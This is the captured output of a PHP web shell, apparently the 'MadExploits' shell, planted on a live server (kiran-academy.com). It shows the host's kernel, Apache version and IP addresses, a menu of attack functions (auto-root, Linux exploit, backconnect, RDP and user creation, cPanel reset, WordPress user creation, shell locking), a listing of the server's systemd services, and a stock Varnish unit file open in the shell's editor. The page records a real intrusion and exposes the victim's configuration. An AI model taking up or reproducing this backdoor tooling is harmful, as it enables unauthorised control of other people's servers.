Linux server.kiran-academy.com 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
: 194.233.91.196 | : 216.73.216.172
Cant Read [ /etc/named.conf ]
7.4.32
finalho
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
systemd /
system /
multi-user.target.wants /
[ HOME SHELL ]
Name
Size
Permission
Action
NetworkManager.service
1.41
KB
-rw-r--r--
amavisd.service
499
B
-rw-r--r--
atd.service
222
B
-rw-r--r--
auditd.service
1.35
KB
-rw-r--r--
cbpolicyd.service
308
B
-rw-r--r--
chronyd.service
495
B
-rw-r--r--
clamd.service
419
B
-rw-r--r--
crond.service
318
B
-rw-r--r--
csf.service
270
B
-rw-r--r--
cwp-phpfpm.service
394
B
-rw-r--r--
cwpsrv-phpfpm.service
396
B
-rw-r--r--
cwpsrv.service
381
B
-rw-r--r--
dovecot.service
1014
B
-rw-r--r--
httpd.service
293
B
-rw-r--r--
irqbalance.service
209
B
-rw-r--r--
kdump.service
349
B
-rw-r--r--
lfd.service
226
B
-rw-r--r--
maldet.service
362
B
-rw-r--r--
mariadb.service
5.88
KB
-rw-r--r--
memcached.service
257
B
-rw-r--r--
named.service
824
B
-rw-r--r--
nginx.service
498
B
-rw-r--r--
opendkim.service
838
B
-rw-r--r--
php-fpm56.service
348
B
-rw-r--r--
php-fpm70.service
334
B
-rw-r--r--
php-fpm71.service
535
B
-rw-r--r--
php-fpm72.service
535
B
-rw-r--r--
php-fpm73.service
535
B
-rw-r--r--
php-fpm74.service
2.51
KB
-rw-r--r--
php-fpm80.service
2.51
KB
-rw-r--r--
php-fpm81.service
2.51
KB
-rw-r--r--
postfix.service
463
B
-rw-r--r--
pure-ftpd.service
246
B
-rw-r--r--
redis.service
393
B
-rw-r--r--
remote-fs.target
482
B
-rw-r--r--
rhel-configure.service
408
B
-rw-r--r--
rpcbind.service
385
B
-rw-r--r--
rsyslog.service
465
B
-rw-r--r--
spamassassin.service
372
B
-rw-r--r--
sshd.service
373
B
-rw-r--r--
sysstat.service
421
B
-rw-r--r--
tuned.service
376
B
-rw-r--r--
varnish.service
1.1
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : varnish.service
[Unit] Description=Varnish Cache, a high-performance HTTP accelerator After=network.target [Service] # If you want to make changes to this file, please copy it to # /etc/systemd/system/varnish.service and make your changes there. # This will override the file kept at /lib/systemd/system/varnish.service # # Enviroment variables may be found in /etc/varnish/varnish.params # # Maximum number of open files (for ulimit -n) LimitNOFILE=131072 # Locked shared memory (for ulimit -l) # Default log size is 82MB + header LimitMEMLOCK=85983232 # On systemd >= 228 enable this to avoid "fork failed" on reload. #TasksMax=infinity # Maximum size of the corefile. LimitCORE=infinity EnvironmentFile=/etc/varnish/varnish.params Type=forking PIDFile=/var/run/varnish.pid PrivateTmp=true ExecStart=/usr/sbin/varnishd \ -P /var/run/varnish.pid \ -f $VARNISH_VCL_CONF \ -a ${VARNISH_LISTEN_ADDRESS}:${VARNISH_LISTEN_PORT} \ -T ${VARNISH_ADMIN_LISTEN_ADDRESS}:${VARNISH_ADMIN_LISTEN_PORT} \ -S $VARNISH_SECRET_FILE \ -s $VARNISH_STORAGE \ $DAEMON_OPTS ExecReload=/usr/sbin/varnish_reload_vcl [Install] WantedBy=multi-user.target
Close